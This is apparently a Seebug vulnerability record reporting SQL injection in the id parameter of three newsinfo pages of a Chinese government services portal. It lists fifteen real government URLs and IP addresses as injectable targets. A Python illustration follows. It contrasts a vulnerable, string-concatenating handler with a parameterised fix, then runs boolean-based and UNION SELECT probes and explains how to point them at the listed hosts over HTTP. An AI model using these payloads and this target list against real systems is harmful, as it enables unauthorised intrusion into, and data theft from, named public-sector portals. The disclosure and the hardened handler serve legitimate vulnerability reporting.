Three generic SQL injection vulnerabilities in a government services system

2015-06-10T00:00:00
ID SSV:95828
Type seebug
Reporter Root
Modified 2015-06-10T00:00:00

Description

Brief description:

rt: I'm a white hat with a conscience; I redeemed an item a month ago, please ship it!

Detailed description:

Three generic SQL injection vulnerabilities in a government services system. The same three pages (newsinfo3.aspx, newsinfo4.aspx and newsinfo5.aspx) are injectable through their id parameter on every deployment of the portal listed below, so the flaw is in the shared product code rather than in one site's configuration.

Case 1 (newsinfo3.aspx, parameter id):
http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo3.aspx?id=25
http://www.gjzwzx.cn/portal/xzsp3//newsinfo3.aspx?id=25
http://www.gczw.gov.cn/portal/xzsp4//newsinfo3.aspx?id=25
http://211.142.37.152:89/portal/xzsp3//newsinfo3.aspx?id=25
http://www.dtzwdt.gov.cn/portal/xzsp3//newsinfo3.aspx?id=25

Case 2 (newsinfo4.aspx, parameter id):
http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo4.aspx?id=1
http://www.dtzwdt.gov.cn/portal/xzsp3/newsinfo4.aspx?id=1
http://211.142.37.152:89/portal/xzsp3/newsinfo4.aspx?id=1
http://www.gczw.gov.cn/portal/xzsp4/newsinfo4.aspx?id=1
http://www.gjzwzx.cn/portal/xzsp3/newsinfo4.aspx?id=1

Case 3 (newsinfo5.aspx, parameter id):
http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo5.aspx?id=1
http://www.dtzwdt.gov.cn/portal/xzsp3/newsinfo5.aspx?id=1
http://211.142.37.152:89/portal/xzsp3/newsinfo5.aspx?id=1
http://www.gczw.gov.cn/portal/xzsp4/newsinfo5.aspx?id=1
http://www.gjzwzx.cn/portal/xzsp3/newsinfo5.aspx?id=1
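The report only lists the affected URLs and shows scanner screenshots, so as an added illustration (not code from the original report or from the affected product) the following Python models the injectable pattern behind a page such as newsinfo3.aspx?id=25 next to a hardened handler, and runs the boolean-based differential check a scanner uses to confirm a numeric id parameter. It goes one step further than the report and shows why a confirmed injection matters, with a UNION probe that pulls attacker-chosen data into the page. The schema, the DBMS (an in-memory SQLite table standing in for whatever database the real ASP.NET portal uses) and the sample rows are constructed assumptions; nothing on the page shows them. Because the id value is used in a numeric context, no quote character is needed to break out of the query, which is exactly why the bare suffixes AND 1=1 / AND 1=2 are enough.

```python
import functools
import re
import sqlite3

# Constructed stand-in for the news table behind newsinfo3.aspx. Assumption: the page
# does not show the real schema or DBMS, so an in-memory SQLite table is used here.
SAMPLE_ROWS = [(1, "Notice 1"), (25, "Notice 25"), (26, "Notice 26")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def newsinfo_vulnerable(conn, id_param):
    """The injectable pattern: the raw ?id= value is concatenated into the SQL text."""
    sql = "SELECT id, title FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def newsinfo_fixed(conn, id_param):
    """Hardened handler: allow-list the value as a bare integer, then bind it."""
    if not re.fullmatch(r"[0-9]{1,9}", id_param):
        return []  # anything that is not a plain numeric id is rejected outright
    return conn.execute("SELECT id, title FROM news WHERE id=?", (int(id_param),)).fetchall()


def _observe(fetch, id_param):
    """Normalise one page fetch into a comparable response: its rows, or the error class."""
    try:
        return ("rows", tuple(fetch(id_param)))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


def boolean_probe(fetch, base_id):
    """Boolean-based differential check of a numeric ?id= parameter.

    fetch(id_param) models one HTTP request to a newsinfo*.aspx page and returns the
    rows it renders. The parameter is injectable if appending a true condition leaves
    the response unchanged while a false condition changes it.
    """
    baseline = _observe(fetch, base_id)
    with_true = _observe(fetch, base_id + " AND 1=1")
    with_false = _observe(fetch, base_id + " AND 1=2")
    return baseline == with_true and baseline != with_false


def union_probe(fetch, base_id):
    """Once injection is confirmed, a UNION pulls attacker-chosen data into the page."""
    return _observe(fetch, base_id + " UNION SELECT 1, sqlite_version()")


def run_demo():
    """Run both probes against the vulnerable and the hardened handler."""
    conn = make_db()
    vuln = functools.partial(newsinfo_vulnerable, conn)
    safe = functools.partial(newsinfo_fixed, conn)
    return {
        "vulnerable_detected": boolean_probe(vuln, "25"),
        "fixed_detected": boolean_probe(safe, "25"),
        "vulnerable_union": union_probe(vuln, "25"),
        "fixed_union": union_probe(safe, "25"),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Against the vulnerable handler the probe reports True and the UNION row (1, sqlite_version()) appears beside the legitimate article; against the hardened handler both suffixed requests are rejected before reaching the database, so the probe reports False and the UNION returns nothing. A real verification against the listed hosts would replace fetch with an HTTP request and compare the rendered HTML (or response length) instead of rows; the decision logic is the same.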

Proof of vulnerability:

Injection proof: Case 1: http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo3.aspx?id=25

<img src="https://images.seebug.org/upload/201506/1015405269951350fad8683c27f81d7412f52115.jpg" alt="QQ图片20150610153957.jpg" width="600">

Case 2: http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo4.aspx?id=1

<img src="https://images.seebug.org/upload/201506/10154108e65ceefd9e146441b75b4e810fe7a5c6.jpg" alt="QQ图片20150610153957.jpg" width="600">

Case 3: http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo5.aspx?id=1

<img src="https://images.seebug.org/upload/201506/10154118ba14c795382cce968f4ec2d4186d8df9.jpg" alt="QQ图片20150610153957.jpg" width="600">

<img src="https://images.seebug.org/upload/201506/10154127d40cf5ebe2f50cedc677ff1a6437aa63.jpg" alt="QQ图片20150610154012.jpg" width="600">